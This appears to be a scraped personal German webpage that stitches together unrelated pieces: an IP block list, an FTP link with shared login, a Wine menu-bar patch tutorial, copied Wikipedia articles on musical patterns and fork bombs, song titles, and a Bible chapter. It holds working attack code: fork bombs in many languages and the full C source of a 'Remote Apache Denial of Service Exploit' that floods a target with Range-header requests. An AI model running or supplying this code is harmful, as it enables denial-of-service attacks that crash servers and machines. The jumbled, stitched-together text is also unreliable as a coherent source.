45.117.232.122 DISCARD
92.60.224.56 DISCARD
46.161.42.79 DISCARD
13.57.69.126 DISCARD
74.125.0.0/16 DISCARD
74.125.82.71 DISCARD
139.99.201.110 DISCARD
201.116.242.116 DISCARD
193.238.247.147 DISCARD
75.103.110.49 DISCARD
186.250.119.15 DISCARD
143.0.180.36 DISCARD
139.99.0.0/16 DISCARD
46.161.42.106 DISCARD
139.99.194.66 DISCARD
91.192.0.0/16 DISCARD
91.192.42.119 DISCARD
87.119.0.0/16 DISCARD
87.119.210.180 DISCARD
150.188.25.48 DISCARD
203.200.188.6 DISCARD
93.180.157.120 DISCARD
87.119.210.183 DISCARD
138.68.66.237 DISCARD
185.239.190.54 DISCARD
193.49.3.193 DISCARD
178.33.164.52 DISCARD
185.215.51.6 DISCARD
136.243.76.114 DISCARD
8.7.0.0/16 DISCARD
63.232.236.148 DISCARD
87.98.240.67 DISCARD
145.239.86.194 DISCARD
199.195.129.50 DISCARD
91.192.42.126 DISCARD
211.172.241.50 DISCARD
122.248.32.156 DISCARD
104.129.56.178 DISCARD
185.84.182.96 DISCARD
177.85.0.0/16 DISCARD
131.161.236.10 DISCARD
46.101.0.0/16 DISCARD
208.70.196.45 DISCARD
203.113.130.203 DISCARD
199.195.129.82 DISCARD
217.182.43.146 DISCARD
108.174.0.0/16 DISCARD
108.174.198.120 DISCARD
174.138.0.0/16 REJECT
177.85.102.63 DISCARD
77.238.178.147 DISCARD
198.2.138.55 DISCARD
212.72.0.0/16 DISCARD
212.72.34.85 DISCARD
198.61.254.34 DISCARD
46.101.158.32 DISCARD
87.119.210.166 REJECT
185.253.0.0/16 DISCARD
185.126.0.0/16 DISCARD
188.166.65.121 DISCARD
54.38.48.234 DISCARD
185.253.96.69 DISCARD
206.189.0.0/16 DISCARD
206.189.18.15 DISCARD
185.88.68.21 DISCARD
81.92.0.0/16 DISCARD
81.92.206.142 DISCARD
185.216.0.0/16 DISCARD
185.216.33.43 DISCARD
54.37.56.118 DISCARD
91.250.80.22 DISCARD
202.171.69.11 DISCARD
138.68.45.129 DISCARD
188.68.38.227 DISCARD
106.10.241.153 DISCARD
83.235.69.31 DISCARD
202.138.229.42 DISCARD
116.196.65.197 DISCARD
8.7.44.147 DISCARD
162.216.113.86 DISCARD
192.186.113.106 DISCARD
212.83.0.0/16 DISCARD
176.123.0.0/16 DISCARD
66.220.0.0/16 DISCARD
149.56.205.105 DISCARD
176.123.8.179 DISCARD
51.38.116.160 DISCARD
83.206.233.70 DISCARD
77.73.0.0/16 REJECT
66.220.155.170 DISCARD
77.73.183.17 DISCARD
91.134.185.54 DISCARD
145.239.92.62 DISCARD
212.32.240.151 DISCARD
176.123.8.169 DISCARD
146.185.163.122 DISCARD
37.252.120.91 DISCARD
37.59.240.42 DISCARD
196.53.0.0/16 DISCARD
196.53.82.200 DISCARD
91.134.185.61 DISCARD
23.238.22.145 DISCARD
114.67.65.127 DISCARD
46.165.0.0/16 DISCARD
104.47.0.0/16 DISCARD
104.47.2.220 DISCARD
206.189.162.172 DISCARD
82.57.200.123 DISCARD
66.85.47.65 DISCARD
153.149.230.18 DISCARD
86.105.0.0/16 DISCARD
86.105.9.210 DISCARD
185.153.230.89 DISCARD
185.153.0.0/16 DISCARD
37.48.67.202 DISCARD
185.171.233.155 DISCARD
83.240.185.241 DISCARD
86.105.9.211 DISCARD
165.227.153.162 DISCARD
185.126.197.58 DISCARD
86.105.9.219 DISCARD
185.99.122.77 DISCARD
185.99.0.0/16 DISCARD
147.231.40.4 DISCARD
77.48.0.0/16 DISCARD
206.75.213.45 DISCARD
209.190.73.58 DISCARD
86.105.9.218 DISCARD
196.53.82.197 DISCARD
178.17.170.67 DISCARD
212.83.177.161 DISCARD
104.47.38.235 DISCARD
86.105.9.196 DISCARD
196.53.83.10 DISCARD
172.93.138.159 DISCARD
173.249.25.233 DISCARD
196.53.82.135 DISCARD
93.90.123.154 DISCARD
61.161.141.120 DISCARD
94.199.215.3 DISCARD
204.29.186.58 DISCARD
77.48.123.125 DISCARD
54.37.200.42 DISCARD
77.81.0.0/16 DISCARD
89.34.111.106 DISCARD
164.132.112.91 DISCARD
54.36.0.0/16 DISCARD
72.46.129.26 DISCARD
198.23.191.254 DISCARD
78.31.71.148 DISCARD
5.79.113.230 DISCARD
103.99.24.3 DISCARD
78.46.164.197 DISCARD
172.93.138.155 DISCARD
91.194.249.203 DISCARD
91.235.128.115 DISCARD
89.33.246.53 DISCARD
145.239.237.247 DISCARD
89.33.0.0/16 DISCARD
91.207.0.0/16 DISCARD
89.33.246.50 DISCARD
91.207.103.99 DISCARD
89.33.246.55 DISCARD
153.92.252.171 DISCARD
46.165.236.237 DISCARD
185.99.123.62 DISCARD
212.6.185.50 DISCARD
54.38.48.237 DISCARD
94.242.54.207 DISCARD
94.242.0.0/16 DISCARD
63.141.0.0/16 DISCARD
156.17.85.6 DISCARD
45.117.136.163 DISCARD
63.141.248.73 DISCARD
142.54.0.0/16 DISCARD
142.54.244.104 DISCARD
147.135.0.0/16 DISCARD
54.240.9.68 DISCARD
192.129.162.177 DISCARD
62.116.165.209 DISCARD
62.116.0.0/16 DISCARD
188.40.119.234 DISCARD
103.24.233.41 DISCARD
147.135.210.133 DISCARD
213.32.42.107 DISCARD
213.32.0.0/16 DISCARD
95.211.0.0/16 DISCARD
212.182.58.37 DISCARD
5.133.0.0/16 DISCARD
213.32.42.106 DISCARD
92.222.0.0/16 DISCARD
92.222.179.2 DISCARD
200.62.70.201 DISCARD
51.254.0.0/16 DISCARD
51.254.172.62 DISCARD
104.225.252.115 DISCARD
195.234.151.28 DISCARD
185.205.80.221 DISCARD
182.22.91.97 DISCARD
137.74.157.103 DISCARD
46.165.219.233 DISCARD
51.255.0.0/16 DISCARD
68.66.242.12 DISCARD
103.225.0.0/16 DISCARD
51.255.155.79 DISCARD
103.225.73.129 DISCARD
37.61.207.107 DISCARD
76.164.*.* DISCARD
185.140.110.169 DISCARD
185.140.111.112 DISCARD
185.140.*.* DISCARD
63.246.155.123 DISCARD
80.63.23.2 DISCARD
54.36.181.21 DISCARD
96.45.70.96 DISCARD
96.45.0.0/16 DISCARD
63.246.154.228 DISCARD
76.164.205.30 DISCARD
76.164.0.0/16 DISCARD
185.140.0.0/16 DISCARD
63.246.0.0/16 DISCARD
66.118.165.35 DISCARD
66.118.0.0/16 DISCARD 
62.108.161.161 DISCARD 
77.238.176.124 DISCARD
185.207.0.0/16 DISCARD
207.150.183.104 DISCARD
95.140.39.53 DISCARD
208.86.201.17 DISCARD
103.226.192.188 DISCARD
212.72.34.87 DISCARD
5.133.8.215 DISCARD
207.150.0.0/16 DISCARD
95.140.39.178 DISCARD
173.0.51.115 DISCARD
95.140.0.0/16 DISCARD
51.254.254.148 DISCARD
217.182.116.192 DISCARD
185.163.190.44 DISCARD
185.163.0.0/16 DISCARD

AKAI MPC 2500 - FULL Samples takes SIDSTATION C64 c128 MSSIAH

normal_sidstation.jpg normal_akai-mpc-2500-groove-sampler-titel-1024x650.jpg
The file and folder Names are not sorted, because of writing takes so long on the MPC AKAI 2500 ;)
https://it-flash.de/music/ftp/00000000_AKAI_MPC2500-Samples-By-it-flash-de/
name: others password: others
normal_20190502_132549.jpg

Wine so patchen dass die Menue Leiste unter Propellerheads Reason 4 funktioniert Ein Beispiel anhand von Gentoo.


So, -> Weil mich einige Menschen gefragt haben, wie man denn jetzt eine Anwendung patcht. Gegeben ist der Fall, dass Propellerheads Reason 4 unter WINE Emulation (Linux) nicht richtig läuft. Das Programm funktioniert zwar, die Menüleiste kann allerdings nicht benutzt werden. Jetzt suchen wir uns im Bugtracker einen Patch, schauen genau drüber und befinden Ihn als gut.

So sieht der Patch für unser Problem aus: normal_screenshot_20190502_042330.png
Was wir jetzt machen, den Patch mit dem Namen "reason_menubar.patch" in das Patch Verzeichnis kopieren:

    /etc/portage/patches/app-emulation/wine-any-4.0/reason_menubar.patch

Nun können wir die Anwendung über emerge neu zusammenbauen. Alternativ kann man reason_menubar.patch in die Wurzel des Quellcode Verzeichnis schieben und gibt ein: patch -p1 <reason_menubar.patch Das sollte dann auch funktionieren. Man muss das Wine dann allerdings selbst bauen. Was ich hier nicht erkläre.
Jedenfalls sieht das fertige Reason dann emuliert so aus: normal_screenshot_20190502_041753.png

Die Menüleiste kann nun betätigt werden.

Hier nochmal der Patch:

Fixes bug 10845
---
 dlls/user32/menu.c |   49 +++++++++++++++++++++++++++++++++++++++++++++++--
 1 files changed, 47 insertions(+), 2 deletions(-)

diff --git a/dlls/user32/menu.c b/dlls/user32/menu.c
index ab473ea..82b4772 100644
--- a/dlls/user32/menu.c
+++ b/dlls/user32/menu.c
@@ -2332,7 +2332,7 @@ static void MENU_HideSubPopups( HWND hwndOwner, HMENU hmenu,
 {
     POPUPMENU *menu = MENU_GetMenu( hmenu );
 
-    TRACE("owner=%p hmenu=%p 0x%04x\n", hwndOwner, hmenu, sendMenuSelect);
+    TRACE("owner=%p hmenu=%p select 0x%04x flags %08x\n", hwndOwner, hmenu, sendMenuSelect, wFlags);
 
     if (menu && top_popup)
     {
@@ -3069,6 +3069,50 @@ static BOOL MENU_TrackMenu( HMENU hmenu, UINT wFlags, INT x, INT y,
         return FALSE;
     }
 
+    /* recalc the menubar size if needed */
+    /* eg if the application modified the menu in the WM_INITMENU message */
+    if (!( wFlags & TPM_POPUPMENU) && !menu->Height)
+    {
+        RECT rc;
+        LONG style = GetWindowLongW( hwnd, GWL_STYLE );
+        LONG exstyle = GetWindowLongW( hwnd, GWL_EXSTYLE );
+        HDC hdc = GetDCEx( hwnd, 0, DCX_CACHE | DCX_WINDOW );
+        INT width = 0, height = 0;
+        SelectObject( hdc, get_menu_font(FALSE));
+        /* FIXME: calculations taken from nonclient.c and uitools.c */
+        /* unfortunately too intertwined with non-client redrawing */
+        /* I do not like to introduce another unneeded redraw here */
+        /* this code should probaby be put there */
+        GetWindowRect( hwnd, &rc);
+        SetRect( &rc, 0, 0, rc.right - rc.left, 0);
+        rc.top = GetSystemMetrics(SM_CYCAPTION);
+        if( style & WS_THICKFRAME) {
+            width += GetSystemMetrics(SM_CXFRAME) - GetSystemMetrics(SM_CXDLGFRAME);
+            height += GetSystemMetrics(SM_CYFRAME) - GetSystemMetrics(SM_CYDLGFRAME);
+        }
+        if(( style & (WS_BORDER|WS_DLGFRAME)) ||
+            (exstyle & WS_EX_DLGMODALFRAME)) {
+            width += GetSystemMetrics(SM_CXDLGFRAME) - GetSystemMetrics(SM_CXEDGE);
+            height += GetSystemMetrics(SM_CYDLGFRAME) - GetSystemMetrics(SM_CYEDGE);
+        }
+        /* HAS_THICKFRAME */
+        if(((style) & WS_THICKFRAME) && !(((style) & (WS_DLGFRAME|WS_BORDER)) == WS_DLGFRAME)){
+            width++;
+            height++;
+        }
+        /* HAS_BIGFRAME */
+        if(((style) & (WS_THICKFRAME | WS_DLGFRAME)) || ((exstyle) & WS_EX_DLGMODALFRAME)){
+            width++;
+            height++;
+        }
+        rc.left += width;
+        rc.right -= width;
+        rc.top += height;
+        rc.bottom = rc.top + GetSystemMetrics(SM_CYMENU);
+        MENU_MenuBarCalcSize( hdc, &rc, menu, hwnd );
+        ReleaseDC( hwnd, hdc );
+    }
+
     if (wFlags & TPM_BUTTONDOWN)
     {
 	/* Get the result in order to start the tracking or not */
@@ -3361,7 +3405,8 @@ static BOOL MENU_InitTracking(HWND hWnd, HMENU hMenu, BOOL bPopup, UINT wFlags)
     {
        SendMessageW( hWnd, WM_INITMENU, (WPARAM)hMenu, 0 );
        /* If an app changed/recreated menu bar entries in WM_INITMENU
-        * menu sizes will be recalculated once the menu created/shown.
+        * menu sizes must be recalculated.
+        * Either in MENU_TrackMenu or when the menu is created/shown.
         */
     }
     
-- 
1.6.2.1

Real Patois

Wikipedia RIPPIN Wettbewerb 1

Pattern (Musik)
Zur Navigation springen
Zur Suche springen

Das Pattern (Plural: Pattern; englisch: Muster; von lateinisch patronus: Patron[1]) bezeichnet im Sprachgebrauch von Musikern und Komponisten eine harmonisch oder rhythmisch wiederkehrende Struktur. Der Begriff bezieht sich vornehmlich auf perkussive Elemente oder Schlagzeug und wird zum Teil aus diesem Kontext in andere, allgemeinere Bedeutungen überführt. Hier ist dann zumeist einfach ein wiederkehrendes Motiv gemeint, der Begriff Pattern ist in solchen Fällen ein Anglizismus.

Die Musikethnologie bedient sich dieses Begriffs spezifischer. Es werden Pattern nach der Anzahl ihrer Schläge (Pulse) unterschieden, in der afrikanischen Musik herrschen kleine Anzahlen vor, zwei, drei oder vier Schläge. Mindestens zwei werden dort miteinander verzahnt. Verschiedenzahlige Pattern verschieben sich gegeneinander im Laufe eines Stückes, ähnlich einer Schwebung. Da verschiedene Tonhöhen bei Trommeln (Djembe) vorkommen können, entstehen nicht nur rhythmische Gestalten, sondern durch die Verschiebung der Schwerpunkte und Zusammenklänge auch melodische.

In der elektronischen Musik hat der Begriff im Prinzip die gleiche Bedeutung. Ein programmiertes Pattern beschreibt ebenfalls ein musikalisches Grundmuster oder einfach Motiv, das – auch in leichten Abwandlungen – mehrfach wiederholt wird. Die amerikanische Minimal Music beruht häufig auf der ständigen Abwandlung solcher Pattern. Bei leichten zeitlichen Verschiebungen der Pattern in verschiedenen Stimmen oder Instrumenten entsteht eine sogenannte Phase. Der Umgang damit wird als Kompositionstechnik Phasing genannt.

Die bekanntesten Komponisten, die mit elektronischen Patterns arbeiteten, sind Steve Reich, Terry Riley und Philip Glass. 

flash2 aka DJSpaceCourt - One Dynasty

flash2 aka DJSpaceCourt - Sunny Day

https://www.helles-koepfchen.de/artikel/3596.html [Was ist eine Dynasty?] kruemelmonster1.png

Der Gruefello

DJSpaceCourt - Superfly [Energy2000]

Sesamstrasse - Krieg der Kekse

Now: Logged ON: - Have Fun! ;-)
           (\-.
           / _`.---------.
   _)     / _)=|'-------'|
  (      / _/  |O   O   o|
   `-.__(___)_ | o O . o |
               `---------'
 must be gouda

Wikipedia Rippin Wettbewerb A Fork Bomb An example on Apache Webserver

Fork bomb
From Wikipedia, the free encyclopedia
Jump to navigation
Jump to search
"Rabbit virus" redirects here. For the disease used in an attempt to exterminate rabbits in Australia, see Myxomatosis.
The concept behind a fork bomb — the processes continually replicate themselves, potentially causing a denial of service

In computing, a fork bomb (also called rabbit virus or wabbit[1]) is a denial-of-service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation.
Contents

    1 History
    2 Implementation
    3 Examples of fork bombs
        3.1 Perl
        3.2 Python
        3.3 C
        3.4 Java
        3.5 Lua
        3.6 Assembly (Linux running on IA-32)
        3.7 Shell script
            3.7.1 Bash
        3.8 Windows batch
        3.9 PowerShell
    4 Prevention
    5 See also
    6 References

History

Around 1978, an early variant of a fork bomb called wabbit was reported to run on a System/360. It may have descended from a similar attack called RABBITS reported from 1969 on a Burroughs 5500 at the University of Washington.[1]
Implementation

Fork bombs operate both by consuming CPU time in the process of forking, and by saturating the operating system's process table.[2][3] A basic implementation of a fork bomb is an infinite loop that repeatedly launches new copies of itself.

In Unix-like operating systems, fork bombs are generally written to use the fork system call.[3] As forked processes are also copies of the first program, once they resume execution from the next address at the frame pointer, they continue forking endlessly within their own copy of the same infinite loop; this has the effect of causing an exponential growth in processes. As modern Unix systems generally use copy-on-write when forking new processes,[4] a fork bomb generally will not saturate such a system's memory.

Microsoft Windows operating systems do not have an equivalent functionality to the Unix fork system call;[5] a fork bomb on such an operating system must therefore create a new process instead of forking from an existing one.
Examples of fork bombs
Perl

An inline shell example using the Perl interpreter:

 perl -e "fork while fork" &

Python

import os
while True:
    os.fork()

C

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
    while(1) {
      fork();
    }
    return 0;
}

Java

public class ForkBomb
{
  public static void main(String[] args)
  {
    while(true)
    {
      Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
    }
  }
}

Lua

-- Requires `luaposix' module
local unistd = require "posix.unistd"

while true do
	unistd.fork()
end

Assembly (Linux running on IA-32)

section .text
    global _start
    
_start:
    mov eax,2 ;System call for forking
    int 0x80  ;Call kernel
    jmp _start

Shell script

Here's an example in which a shell script is told to run two instances of $0 ― $0 is a shell variable returning the name of the script itself ― and pipe the output of one through the other, which results in exponentially replicating processes.

#!/bin/sh
./$0|./$0&

A simpler way is to just run ./$0& twice:

#!/bin/sh
./$0&
./$0&


Bash

In Bash, a fork bomb can be performed by declaring and calling a multiple-recursive function:

bomb(){
  bomb | bomb & 
}
bomb

Additionally, one of the most famous and commonly cited examples of a fork bomb is this dense one-line Bash command:

 :(){ :|:& };:

This command is an obfuscated version of the above. The trick here is that : is used as a function name, which is possible because the colon is not a reserved character in Bash as it is in most other languages. Otherwise, it is identical.[6]

With unicode support, it can similarly be rendered as:

💣(){ 💣|💣& };💣

Windows batch

:ForkBomb
 start "" %1
 goto ForkBomb

The same as above, but shorter:

 %0 | %0

The same as above, but done in command line using ^ to escape specials:

echo  %0^|%0  > forkbomb.bat
forkbomb.bat

Condensed version designed to be run directly from the Run... prompt:

cmd /k echo -^|->-.bat&-

PowerShell

while($true) { 
    Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
    Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';}

Prevention

As a fork bomb's mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit -u 30 would limit the affected user to a maximum of thirty owned processes.[7] On PAM-enabled systems, this limit can also be set in /etc/security/limits.conf,[8] and on FreeBSD, the system administrator can put limits in /etc/login.conf.[9]
See also

    Denial-of-service attack
    Deadlock
    Time bomb (software)
    Logic bomb

References

Raymond, Eric S. (October 1, 2004). "wabbit". The Jargon Lexicon. Retrieved October 15, 2013.
Ye, Nong (2008). Secure Computer and Network Systems: Modeling, Analysis and Design. p. 16. ISBN 0470023244.
Jielin, Dong (2007). Network Dictionary. p. 200. ISBN 1602670005.
Dhamdhere, D. M. (2006). Operating Systems: A Concept-based Approach. p. 285. ISBN 0070611947.
Hammond, Mark (2000). Python Programming On Win32: Help for Windows Programmers. p. 35. ISBN 1565926218.
"Fork() Bomb - GeeksforGeeks". GeeksforGeeks. June 19, 2017. Retrieved June 27, 2018.
Cooper, Mendel (2005). Advanced Bash Scripting Guide. pp. 305–306. ISBN 1430319305.
Soyinka, Wale (2012). Linux Administration: A Beginners Guide. pp. 364–365. ISBN 0071767592.

    Lucas, Michael W. (2007). Absolute FreeBSD: The Complete Guide to FreeBSD. pp. 198–199. ISBN 1593271514.

Categories:

    Denial-of-service attacksProcess (computing)

<b>

ut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
 * Copyright 2011 Ramon de C Valle <rcvalle@redhat.com>
 *
 * Compile with the following command:
 * gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <pthread.h>
 
void ptrace_trap(void) __attribute__ ((constructor));
 
void
ptrace_trap(void) {
    if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
        write(fileno(stdout), "Segmentation fault\n", 19);
        exit(-1);
    }
}
 
void
w4rn41dun14mu(int attr, int fg, int bg)
{
    char command[13];
 
    sprintf(command, "%c[%d;%d;%dm", 0x1b, attr, fg+30, bg+40);
    printf("%s", command);
}
 
void
banner()
{
    w4rn41dun14mu(0, 1, 0);
    fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\n", 53, 1,
           stdout);
}
 
void
gime_er_mas()
{
    printf("%c%s", 0x1b, "[2J");
    printf("%c%s", 0x1b, "[1;1H");
    puts("\nsorry dude there's an error...");
}
 
struct thread_info {
    pthread_t thread_id;
    int       thread_num;
    char     *argv_string;
};
 
static void *
thread_start(void *arg)
{
    struct thread_info *tinfo = (struct thread_info *) arg;
    char hostname[64];
    int j;
 
    strcpy(hostname, tinfo->argv_string);
 
    j = 0;
    while (j != 10) {
        struct addrinfo hints;
        struct addrinfo *result, *rp;
        int sfd, s;
        ssize_t nwritten;
 
        memset(&hints, 0, sizeof(struct addrinfo));
        hints.ai_family = AF_UNSPEC;
        hints.ai_socktype = SOCK_STREAM;
        hints.ai_flags = 0;
        hints.ai_protocol = 0;
 
        s = getaddrinfo(hostname, "http", &hints, &result);
        if (s != 0) {
            fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s));
            exit(EXIT_FAILURE);
        }
 
        for (rp = result; rp != NULL; rp = rp->ai_next) {
            sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
            if (sfd == -1)
                continue;
 
            if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1)
                close(sfd);
        }
 
        if (result != NULL)
            freeaddrinfo(result);
 
        nwritten = write(sfd, "HEAD / HTTP/1.1\n"
                              "Host:localhost\n"
                              "Range:bytes=0-,0-\n"
                              "Accept-Encoding: gzip", 71);
        if (nwritten == -1)
            close(sfd);

        usleep(300000);

        j++;
    }

    return 0;
}

int
main(int argc, char *argv[])
{
    int i;
    struct thread_info tinfo;

    banner();

    if (argc <= 1) {
        w4rn41dun14mu(0, 2, 0);
        fwrite("\n[-] Usage : ./rapache hostname\n", 32, 1, stdout);
        return 0;
    }

    w4rn41dun14mu(0, 3, 0);
    printf("[+] Attacking %s please wait  in minutes ...\n", argv[1]);

    while (1) {
        i = 0;
        while (i != 50) {
            tinfo.thread_num = i;
            tinfo.argv_string = argv[1];

            pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo);

            usleep(500000);

            i++;
        }
    }
}

Christian Fladung - 2nd Way

Blümchen - Nur für Euch

John Johannes 8 52

Eggman - That's the way IT is

1 Jesus aber ging nach dem Ölberg.
Jesus und die Ehebrecherin
2 Frühmorgens aber kam er wieder in den Tempel, und alles Volk kam zu ihm; und er setzte sich und lehrte sie.
3 Die Schriftgelehrten und die Pharisäer1 aber bringen eine Frau, die beim Ehebruch ergriffen worden war, und stellen sie in die Mitte
4 und sagen zu ihm: Lehrer, diese Frau ist auf frischer Tat beim Ehebruch ergriffen worden.
5 In dem Gesetz aber hat uns Mose geboten, solche zu steinigen. Du nun, was sagst du?
6 Dies aber sagten sie, ihn zu versuchen, damit sie etwas hätten, um ihn anzuklagen. Jesus aber bückte sich nieder und schrieb mit dem Finger auf die Erde.
7 Als sie aber fortfuhren, ihn zu fragen, richtete er sich auf und sprach zu ihnen: Wer von euch ohne Sünde ist, werfe als Erster einen Stein auf sie.
8 Und wieder bückte er sich nieder und schrieb auf die Erde.
9 Als sie aber dies hörten, gingen sie, einer nach dem anderen, hinaus, angefangen von den Älteren2; und er wurde allein gelassen mit der Frau, die in der Mitte stand.
10 Jesus aber richtete sich auf und sprach zu ihr: Frau, wo sind sie? Hat niemand dich verurteilt?
11 Sie aber sprach: Niemand, Herr. Jesus aber sprach zu ihr: Auch ich verurteile dich nicht. Geh hin und sündige von jetzt an nicht mehr!3
Das Licht der Welt
12 Jesus redete nun wieder zu ihnen und sprach: Ich bin das Licht der Welt; wer mir nachfolgt, wird nicht in der Finsternis wandeln, sondern wird das Licht des Lebens haben.
13 Da sprachen die Pharisäer zu ihm: Du zeugst von dir selbst; dein Zeugnis ist nicht wahr.
14 Jesus antwortete und sprach zu ihnen: Auch wenn ich von mir selbst zeuge, ist mein Zeugnis wahr, weil ich weiß, woher ich gekommen bin und wohin ich gehe; ihr aber wisst nicht, woher ich komme oder wohin ich gehe.
15 Ihr richtet nach dem Fleisch, ich richte niemand.
16 Wenn ich aber auch richte, so ist mein Gericht wahr, weil ich nicht allein bin, sondern ich und der Vater, der mich gesandt hat.
17 Aber auch in eurem Gesetz steht geschrieben, dass das Zeugnis zweier Menschen wahr ist.
18 Ich bin es, der von mir selbst zeugt, und der Vater, der mich gesandt hat, zeugt von mir.
19 Da sprachen sie zu ihm: Wo ist dein Vater? Jesus antwortete: Ihr kennt weder mich noch meinen Vater; wenn ihr mich gekannt hättet, so würdet ihr auch meinen Vater gekannt haben.
20 Diese Worte redete er in der Schatzkammer, als er im Tempel lehrte; und niemand legte Hand an ihn, denn seine Stunde war noch nicht gekommen.
Der Gesandte des Vaters
21 Er sprach nun wieder zu ihnen: Ich gehe hin, und ihr werdet mich suchen und werdet in eurer Sünde sterben; wohin ich gehe, könnt ihr nicht hinkommen.
22 Da sagten die Juden: Er will sich doch nicht selbst töten, dass er spricht: Wohin ich gehe, könnt ihr nicht hinkommen?
23 Und er sprach zu ihnen: Ihr seid von dem, was unten ist, ich bin von dem, was oben ist; ihr seid von dieser Welt, ich bin nicht von dieser Welt.
24 Daher sagte ich euch, dass ihr in euren Sünden sterben werdet; denn wenn ihr nicht glauben werdet, dass ich es bin, so werdet ihr in euren Sünden sterben.
25 Da sprachen sie zu ihm: Wer bist du? Jesus sprach zu ihnen: Durchaus das, was ich auch zu euch rede.4
26 Vieles habe ich über euch zu reden und zu richten, aber der mich gesandt hat, ist wahrhaftig; und was ich von ihm gehört habe, das rede ich zu der Welt.
27 Sie erkannten nicht, dass er von dem Vater zu ihnen sprach.
28 Da sprach Jesus zu ihnen: Wenn ihr den Sohn des Menschen erhöht haben werdet, dann werdet ihr erkennen, dass ich es bin und dass ich nichts von mir selbst tue, sondern wie der Vater mich gelehrt hat, das rede ich.
29 Und der mich gesandt hat, ist mit mir; er hat mich nicht allein gelassen, weil ich allezeit das ihm Wohlgefällige tue.
30 Als er dies redete, glaubten viele an ihn.
Wahre Freiheit
31 Jesus sprach nun zu den Juden, die ihm geglaubt hatten: Wenn ihr in meinem Wort bleibt, so seid ihr wahrhaft meine Jünger;
32 und ihr werdet die Wahrheit erkennen, und die Wahrheit wird euch frei machen.
33 Sie antworteten ihm: Wir sind Abrahams Nachkommenschaft5 und sind nie jemandes Sklaven gewesen. Wie sagst du: Ihr sollt frei werden?
34 Jesus antwortete ihnen: Wahrlich, wahrlich, ich sage euch: Jeder, der die Sünde tut, ist der Sünde Sklave.
35 Der Sklave aber bleibt nicht für immer6 im Haus; der Sohn bleibt für immer.
36 Wenn nun der Sohn euch frei machen wird, so werdet ihr wirklich frei sein.
Wahre Nachkommen Abrahams
37 Ich weiß, dass ihr Abrahams Nachkommen seid; aber ihr sucht mich zu töten, weil mein Wort nicht Raum in euch findet.
38 Ich rede, was ich bei dem Vater gesehen habe; auch ihr nun tut, was ihr von eurem7 Vater gehört habt.
39 Sie antworteten und sprachen zu ihm: Abraham ist unser Vater. Jesus spricht zu ihnen: Wenn ihr Abrahams Kinder wäret, so würdet ihr die Werke Abrahams tun;
40 jetzt aber sucht ihr mich zu töten, einen Menschen, der ich euch die Wahrheit gesagt habe, die ich von Gott gehört habe; das hat Abraham nicht getan.
41 Ihr tut die Werke eures Vaters. Sie sprachen nun zu ihm: Wir sind nicht durch Hurerei geboren; wir haben einen Vater, Gott.
42 Jesus sprach zu ihnen: Wenn Gott euer Vater wäre, so würdet ihr mich lieben, denn ich bin von Gott ausgegangen und gekommen; denn ich bin auch nicht von mir selbst gekommen, sondern er hat mich gesandt.
43 Warum versteht ihr meine Sprache nicht? Weil ihr mein Wort nicht hören könnt.
44 Ihr seid aus dem Vater, dem Teufel, und die Begierden eures Vaters wollt ihr tun. Jener war ein Menschenmörder von Anfang an und stand nicht in der Wahrheit, weil keine Wahrheit in ihm ist. Wenn er die Lüge redet, so redet er aus seinem Eigenen, denn er ist ein Lügner und der Vater derselben8.
45 Weil ich aber die Wahrheit sage, glaubt ihr mir nicht.
46 Wer von euch überführt mich einer Sünde9? Wenn ich die Wahrheit sage, warum glaubt ihr mir nicht?
47 Wer aus Gott ist, hört die Worte Gottes. Darum hört ihr nicht, weil ihr nicht aus Gott seid.
48 Die Juden antworteten und sprachen zu ihm: Sagen wir nicht recht, dass du ein Samariter bist und einen Dämon hast?
49 Jesus antwortete: Ich habe keinen Dämon, sondern ich ehre meinen Vater, und ihr verunehrt mich.
50 Ich aber suche nicht meine Ehre: Es ist einer, der sie sucht und der richtet.
51 Wahrlich, wahrlich, ich sage euch: Wenn jemand mein Wort bewahren10 wird, so wird er den Tod nicht sehen in Ewigkeit11.
52 Die Juden sprachen nun zu ihm: Jetzt erkennen wir, dass du einen Dämon hast. Abraham ist gestorben und die Propheten, und du sagst: Wenn jemand mein Wort bewahren12 wird, so wird er den Tod nicht schmecken in Ewigkeit13.
53 Bist du etwa größer als unser Vater Abraham, der gestorben ist? Und die Propheten sind gestorben. Was machst du aus dir selbst?
54 Jesus antwortete: Wenn ich mich selbst ehre, so ist meine Ehre nichts; mein Vater ist es, der mich ehrt, von dem ihr sagt: Er ist unser Gott.
55 Und ihr habt ihn nicht erkannt, ich aber kenne ihn; und wenn ich sagte: Ich kenne ihn nicht, so würde ich euch gleich sein: ein Lügner. Aber ich kenne ihn, und ich bewahre14 sein Wort.
56 Abraham, euer Vater, jubelte, dass er meinen Tag sehen sollte, und er sah ihn und freute sich.
57 Da sprachen die Juden zu ihm: Du bist noch nicht fünfzig Jahre alt und hast Abraham gesehen?
58 Jesus sprach zu ihnen: Wahrlich, wahrlich, ich sage euch: Ehe Abraham war, bin ich.
59 Da hoben sie Steine auf, um sie auf ihn zu werfen. Jesus aber verbarg sich und ging aus dem Tempel hinaus.
Revidierte Elberfelder Bibel (Rev. 26) © 1985/1991/2008 SCM R.Brockhaus im SCM-Verlag GmbH & Co. KG, Witten
Der Text der Revidierten Elberfelder Bibel unterliegt dem Copyright und darf weder kopiert noch anderweitig vervielfältigt werden.
Feedback | For Webmasters | Donate
